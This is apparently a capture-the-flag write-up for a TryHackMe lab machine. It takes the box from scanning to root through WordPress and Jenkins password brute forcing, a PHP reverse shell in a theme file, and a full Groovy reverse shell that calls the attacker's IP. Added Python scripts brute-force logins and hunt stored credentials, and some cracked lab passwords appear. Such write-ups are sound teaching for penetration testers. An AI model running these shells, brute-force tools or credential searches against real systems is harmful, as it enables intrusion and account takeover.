Internal - Pentesting Challenge @THM
Overview

Reconnaissance
# nmap -A -T4 -oN internal-pentesting.nmap.txt 10.10.188.67
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-25 20:29 EST
Nmap scan report for 10.10.188.67
Host is up (0.080s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/25%OT=22%CT=1%CU=42806%PV=Y%DS=4%DC=T%G=Y%TM=5FBF05
OS:23%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST
OS:11NW7%O6=M506ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)EC
OS:N(R=Y%DF=Y%T=40%W=F507%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 10.72 ms 10.6.0.1
2 ... 3
4 83.68 ms 10.10.188.67

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.05 seconds

Ports 22 (SSH) and 80 (HTTP) are open; everything else in the top 1000 is closed.

Nmap also identifies the web server as Apache httpd 2.4.29 on Ubuntu, and the browser shows only the default "Apache2 Ubuntu Default Page", so the real content must live somewhere below the document root.
We can fire up dirb/gobuster to enumerate a little deeper and see if we can find any directories.
Enumeration
I ran a directory scan and found several directories, including wordpress, blog and phpmyadmin, which look very interesting.
# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.188.67 -t100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.188.67
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/25 20:43:02 Starting gobuster
===============================================================
/wordpress (Status: 301)
/javascript (Status: 301)
/blog (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
===============================================================
2020/11/25 20:46:10 Finished
===============================================================

I tried phpmyadmin with default credentials but it did not help. The /blog path turned out to be a WordPress install, so I pointed wpscan at it with a password attack against the admin user (internal.thm is a local hosts-file entry for 10.10.188.67, as the wpscan output confirms).
$ sudo wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt --max-threads 100
[sudo] password for eneloop:
_______________________________________________________________
 __ _______ _____
 \ \ / / __ \ / ____|
 \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
 \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
 \ /\ / | | ____) | (__| (_| | | | |
 \/ \/ |_| |_____/ \___|\__,_|_| |_|

 WordPress Security Scanner by the WPScan Team
 Version 3.8.10
 Sponsored by Automattic - https://automattic.com/
 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.188.67]
[+] Started: Wed Nov 25 21:44:22 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 | - http://codex.wordpress.org/XML-RPC_Pingback_API
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 | - https://www.iplocation.net/defend-wordpress-from-ddos
 | - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 | - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 | - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 | - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <=================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / my2boys
Trying admin / nguyen Time: 00:00:59 < > (3900 / 14348292) 0.02% ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: XXXXXXX

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Nov 25 21:45:31 2020
[+] Requests Done: 3952
[+] Cached Requests: 5
[+] Data Sent: 1.924 MB
[+] Data Received: 2.588 MB
[+] Memory used: 238.996 MB
[+] Elapsed time: 00:01:08

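Worth understanding why the "password attack on Xmlrpc" above finishes in about a minute. The following is an added example, not code from the writeup or from wpscan: it builds the XML-RPC request wpscan-style tooling uses (wp.getUsersBlogs takes a username and password and returns a fault code 403 on a wrong guess) and batches many guesses into one system.multicall request, which is the reason xmlrpc.php is so much faster to brute force than wp-login.php. The candidate passwords, the target URL and the sample server response are constructed for the demo; nothing touches the network unless send_multicall() is called.

```python
"""Added example: WordPress XML-RPC password guessing via system.multicall.

wp.getUsersBlogs(username, password) returns the caller's blogs on success
or a struct with faultCode 403 ("Incorrect username or password.") on a
bad guess. system.multicall lets one HTTP POST carry many such calls.
All data below is constructed; send_multicall() is the only network call.
"""
import xmlrpc.client
from urllib.request import Request, urlopen


def build_multicall(username, candidates):
    """One system.multicall body that tests every candidate password."""
    calls = [
        {"methodName": "wp.getUsersBlogs", "params": [username, pw]}
        for pw in candidates
    ]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall(body, candidates):
    """Map each candidate to True (accepted) or False (rejected).

    In a multicall response each element is either a one-element list
    holding the method's return value, or a struct with faultCode /
    faultString describing why that single call failed.
    """
    (results,), _ = xmlrpc.client.loads(body)
    verdict = {}
    for pw, result in zip(candidates, results):
        if isinstance(result, dict) and "faultCode" in result:
            verdict[pw] = False   # e.g. 403 "Incorrect username or password."
        else:
            verdict[pw] = True    # a blog list came back: the login is valid
    return verdict


def send_multicall(xmlrpc_url, username, candidates):
    """Network helper: POST the batch to xmlrpc.php and return verdicts."""
    body = build_multicall(username, candidates).encode()
    req = Request(xmlrpc_url, data=body, headers={"Content-Type": "text/xml"})
    with urlopen(req, timeout=10) as resp:
        return parse_multicall(resp.read().decode(), candidates)


# Constructed sample response: three guesses, only the last one correct.
SAMPLE_RESPONSE = xmlrpc.client.dumps(
    ([
        {"faultCode": 403, "faultString": "Incorrect username or password."},
        {"faultCode": 403, "faultString": "Incorrect username or password."},
        [[{"blogid": "1", "blogName": "Internal", "isAdmin": True}]],
    ],),
    methodresponse=True,
)


def demo():
    """Parse the constructed response for a constructed candidate list."""
    candidates = ["password", "123456", "correct-horse"]
    return parse_multicall(SAMPLE_RESPONSE, candidates)


if __name__ == "__main__":
    for pw, ok in demo().items():
        print(f"{'VALID  ' if ok else 'invalid'} admin / {pw}")
    # Against a live target (placeholder URL):
    # send_multicall("http://internal.thm/blog/xmlrpc.php", "admin", candidates)
```

Defensively, this is also why disabling xmlrpc.php (or at least system.multicall) and rate limiting authentication failures matters: a single request can test hundreds of passwords, so per-request throttling on wp-login.php alone does not help.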
Exploitation
With that, we can log in to WordPress as admin. If you are familiar with WordPress, the admin panel lets you edit theme files online (Appearance -> Theme Editor), and that is a commonly abused feature: whatever PHP you save there is executed by the web server. I wonder why WordPress would support that.

Using the theme editor, edit 404.php of the active theme (twentyseventeen), since it is harmless and extremely unlikely to break the site. Replace the contents of the file with a PHP reverse shell (set the IP and port to your attack machine) and save. Start a listener on the attack machine on that port, then go to the home page, open a blog post and append a few characters to the path; the resulting 404 makes WordPress render the theme's 404.php, which runs the reverse shell. Requesting the file directly at /blog/wp-content/themes/twentyseventeen/404.php also works, since the original template code is gone.
~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.6.19.215] from (UNKNOWN) [10.10.66.198] 37996
Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:34:32 up 21 min, 0 users, load average: 0.00, 0.00, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
We have a shell as www-data.
Let's upload LinEnum.sh so we can enumerate the host further and look for ways to escalate privileges.
Important findings from LinEnum -

[-] Users that have previously logged onto the system:
Username Port From Latest
root pts/0 10.6.2.56 Mon Aug 3 19:59:17 +0000 2020
aubreanna pts/1 10.6.2.56 Mon Aug 3 19:56:19 +0000 2020

[-] /etc/init/ config file permissions:
total 16
drwxr-xr-x 2 root root 4096 Aug 3 03:01 .
drwxr-xr-x 102 root root 4096 Aug 3 18:41 ..
-rw-r--r-- 1 root root 1757 Jan 12 2018 mysql.conf
-rw-r--r-- 1 root root 239 Oct 28 2016 ubuntu-fan.conf

### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.21p2


[-] MYSQL version:
mysql Ver 14.14 Distrib 5.7.31, for Linux (x86_64) using EditLine wrapper


[-] Apache version:
Server version: Apache/2.4.29 (Ubuntu)
Server built: 2020-03-13T12:26:16


[+] Looks like we're hosting Docker:
Docker version 19.03.6, build 369ce74a3c

LinEnum and LinPEAS took us nowhere, and I spent a good 30-40 minutes banging my head against the wall. Then I ran a deeper search with my little script below, looking for any saved credentials I could use, and hit the jackpot.
# wirem0nster: grep a few likely directories for credential keywords,
# discarding permission errors (we are only www-data at this point)
for fs in home etc opt
do
    grep -wirE 'password|credential|passwords|credentials' /$fs/* 2>/dev/null
done
The credentials for the user are stored in a text file in /opt -
$ cat /opt/wp-save.txt
Bill,

Aubreanna needed these credentials for something later. Let her know you have them and where they are.

aubreanna:XXXXXXXXXX
$
Now we can log in over SSH as aubreanna. Her home directory has two text files: user.txt (the user flag) and jenkins.txt, which says a Jenkins service is running locally.
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080
aubreanna@internal:~$ netstat -lnt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:44865 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
aubreanna@internal:~$
The note gives 172.17.0.2:8080, which is the container's address on the Docker bridge (LinEnum already told us Docker is installed), while netstat shows the host publishes it on 127.0.0.1:8080 only. Since the service is bound to loopback we cannot reach it from the attack machine, so let's set up an SSH local port forward to get at the Jenkins login page.
$ ssh -NL 127.0.0.1:8080:localhost:8080 aubreanna@<target-ip>
aubreanna@<target-ip>'s password:

Browse to http://127.0.0.1:8080 and you should see the Jenkins login page; from here we should be able to brute force our way in. Fire up Burp Suite and record the POST request of the login form. We could send it to Intruder and run the brute force there, but that runs extremely slowly, and I prefer to use Hydra instead.

Fun Fact - I was stuck here for an hour trying to use Hydra to crack the password. Finally I reached out to the THM Discord and guess what! I found @THM's Official Mayor and @N3PP13 and chatted with them for hints. I was told that I was on the right path but needed to re-examine the request I was sending. I had a very silly typo, and once I looked again I was able to figure that out myself.
Anyway, here is what works. Hydra posts j_username=admin and j_password=^PASS^ (taken from rockyou) to /j_acegi_security_check on the forwarded port, and F=Invalid tells it that any response containing the string "Invalid" is a failed login -
# hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 localhost http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&Submit=Sign+in:F=Invalid" -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-26 16:55:31
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://localhost:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&Submit=Sign+in:F=Invalid
..
..
[ATTEMPT] target localhost - login "admin" - pass "patrick" - 112 of 14344399 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "iloveme" - 113 of 14344399 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "sakura" - 114 of 14344399 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "adrian" - 115 of 14344399 [child 9] (0/0)
[8080][http-post-form] host: localhost login: admin password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-26 16:55:59
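Since the whole hour lost above came down to one wrong character in the request, here is the same login attempt written out so every field name and the failure check are explicit. This is an added example, not the writeup's code or Hydra's: it assumes Jenkins' standard form login behaviour (POST to /j_acegi_security_check; a bad password answers with a 302 to /loginError, whose page contains "Invalid username or password"; a good one redirects to the "from" target). The base URL is the forwarded 127.0.0.1:8080, the wordlist path is whatever you pass in, and the responses in demo() are constructed so classify() runs offline.

```python
"""Added example: a Jenkins form-login attempt and the F=Invalid style check.

Assumes stock Jenkins behaviour: failure redirects to /loginError (page text
contains "Invalid username or password"), success redirects elsewhere.
Only attempt()/brute() touch the network; demo() uses constructed responses.
"""
import urllib.error
import urllib.parse
import urllib.request

FAIL_MARKER = b"Invalid"   # the substring Hydra's F=Invalid looks for


def build_form(user, password, came_from="/"):
    """Exact field names matter: a typo here makes every login 'fail'."""
    return urllib.parse.urlencode({
        "j_username": user,
        "j_password": password,
        "from": came_from,
        "Submit": "Sign in",
    }).encode()


def classify(status, location, body):
    """Return 'fail' or 'success' the way a failure-marker check would.

    Checks the redirect target first so we do not need to follow the 302,
    then falls back to the marker for tools that did follow it.
    """
    if location and location.rstrip("/").endswith("/loginError"):
        return "fail"                     # Jenkins sent us to the error page
    if FAIL_MARKER in body:
        return "fail"                     # marker present in the page body
    return "success" if status in (200, 302, 303) else "fail"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None                       # surface the 302 instead of following


_OPENER = urllib.request.build_opener(_NoRedirect)


def attempt(base_url, user, password):
    """One login attempt against a live Jenkins; returns 'fail' or 'success'."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/j_acegi_security_check",
        data=build_form(user, password),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    try:
        with _OPENER.open(req, timeout=10) as resp:
            return classify(resp.status, resp.headers.get("Location"), resp.read())
    except urllib.error.HTTPError as err:  # the 302 lands here (not followed)
        return classify(err.code, err.headers.get("Location"), err.read())


def brute(base_url, user, wordlist_path):
    """Hydra-style loop: the first password classified as success wins."""
    with open(wordlist_path, errors="ignore") as fh:
        for line in fh:
            pw = line.rstrip("\n")
            if attempt(base_url, user, pw) == "success":
                return pw
    return None


def demo():
    """Constructed responses: wrong password, right password, followed 302."""
    wrong = classify(302, "http://127.0.0.1:8080/loginError", b"")
    right = classify(302, "http://127.0.0.1:8080/", b"")
    followed = classify(200, None, b"<html>Invalid username or password</html>")
    return wrong, right, followed


if __name__ == "__main__":
    print(demo())
    # Live use through the SSH forward (placeholder wordlist path):
    # print(brute("http://127.0.0.1:8080", "admin", "/usr/share/wordlists/rockyou.txt"))
```

The redirect-target check is the useful part: if you only match on "Invalid" you depend on your tool following the 302, and a typo in a field name gives you a redirect to /loginError for every single password, which looks identical to a wordlist that simply did not contain it. Checking a single known-good or known-bad request by hand before starting the run is what would have caught the typo earlier.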
Post-Exploitation/Privilege Escalation
Log in to the Jenkins console with this password and go to "Manage Jenkins" -> "Script Console". As the page itself says, this lets us run arbitrary Groovy, which executes inside the Jenkins process with whatever privileges it has in the container.
I looked up a Groovy reverse shell and came across this one -
source: https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
String host = "10.6.19.215";   // attack machine
int port = 4444;               // listener port
String cmd = "/bin/bash";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// pump shell output to the socket and socket input to the shell until either side closes
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
Start a listener on the attack machine on port 4444 and run the script; you should now have a reverse shell inside the Jenkins container. Run the same credential search there -
for fs in home etc opt
do
    grep -wirE 'password|credential|passwords|credentials' /$fs/* 2>/dev/null
done

..
..
/etc/subversion/config:# password-stores =
/etc/subversion/config:### Both 'store-passwords' and 'store-auth-creds' can now be
/etc/subversion/config:# store-passwords = no
/opt/note.txt:Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you

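The one-line grep did its job on both the host and the container, but most of what it returns in a real engagement is noise like the subversion config comments above. The following is an added example, not the writeup's script, of a slightly more selective search that serves the same purpose in both places: it walks a list of directories, skips binaries and oversized files, ignores comment-only lines, matches credential keywords (passwords?, credentials?, passwd, secret, token) as well as user:password shaped lines, and reports path, line number and the line. The directory list and regexes are heuristics chosen for this example, and the sample tree it runs on is constructed in a temporary directory.

```python
"""Added example: a more selective credential hunt than a plain recursive grep.

Skips binaries, large files and comment-only lines; flags keyword hits and
user:pass shaped lines. The demo tree is constructed, not taken from the box.
"""
import os
import re
import tempfile

KEYWORDS = re.compile(r"\b(passwords?|credentials?|passwd|secret|token)\b", re.I)
# user:pass style line such as "aubreanna:hunter2" (name 2-32 chars, no spaces)
USERPASS = re.compile(r"^[A-Za-z_][\w-]{1,31}:\S{4,}$")
COMMENT = re.compile(r"^\s*[#;]")
MAX_BYTES = 1 << 20   # skip anything over 1 MiB (logs, caches, databases)


def looks_binary(path):
    with open(path, "rb") as fh:
        return b"\x00" in fh.read(4096)


def hunt(roots):
    """Return [(path, lineno, line)] for lines that look like stored credentials."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    if os.path.getsize(path) > MAX_BYTES or looks_binary(path):
                        continue
                    with open(path, errors="replace") as fh:
                        for n, line in enumerate(fh, 1):
                            s = line.rstrip("\n")
                            if COMMENT.match(s):
                                continue   # "# store-passwords = no" style noise
                            if KEYWORDS.search(s) or USERPASS.match(s.strip()):
                                hits.append((path, n, s))
                except OSError:
                    continue   # unreadable as the current user: move on quietly
    return hits


def build_demo_tree():
    """Construct a tiny filesystem resembling the box, for offline use."""
    base = tempfile.mkdtemp()
    files = {
        "opt/wp-save.txt": "Bill,\n\nAubreanna needed these credentials later.\n\n"
                           "aubreanna:EXAMPLE-NOT-REAL\n",
        "etc/subversion/config": "# password-stores =\n# store-passwords = no\n",
        "home/bob/.bash_history": "ls\nmysql -u root --password=S3cret\n",
        "etc/bin.dat": "\x00\x01password\x00",          # binary: must be skipped
    }
    for rel, content in files.items():
        full = os.path.join(base, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)
    return base


def demo():
    """Run hunt() over the constructed tree; return sorted relative results."""
    base = build_demo_tree()
    return sorted((os.path.relpath(p, base), n, line) for p, n, line in hunt([base]))


if __name__ == "__main__":
    for path, n, line in demo():
        print(f"{path}:{n}: {line}")
    # On a real host you would call hunt(["/home", "/etc", "/opt"]) instead.
```

Run it as www-data on the host and again inside the container; the two note files from this box would be the only hits of interest, while the subversion comments drop out. The user:pass pattern is deliberately narrow (no spaces, at least four characters after the colon) so /etc/passwd style lines with more colons do not flood the output.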
Here you will notice that note.txt stands out: it contains the keywords we are looking for, and it holds the root password for the machine.
cat /opt/note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.

root:XXXXXXXXXXX

Now, if you remember from the LinPEAS and LinEnum output from before, the SSH service allows remote root login (root's last login in the lastlog listing came from 10.6.2.56, and SSH is the only remote service on the box), so we can SSH straight into the machine as root.
:~$ ssh root@<target-ip>
root@<target-ip>'s password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com


..
..


root@internal:~#
root@internal:~# cat root.txt
THM{XXXXXXXXXXXXXXXXXX}
root@internal:~#

Some additional notes:
- Don't give up easily; take a break if you are stuck and come back with a fresh mind.
- Ask for help on Discord or other forums.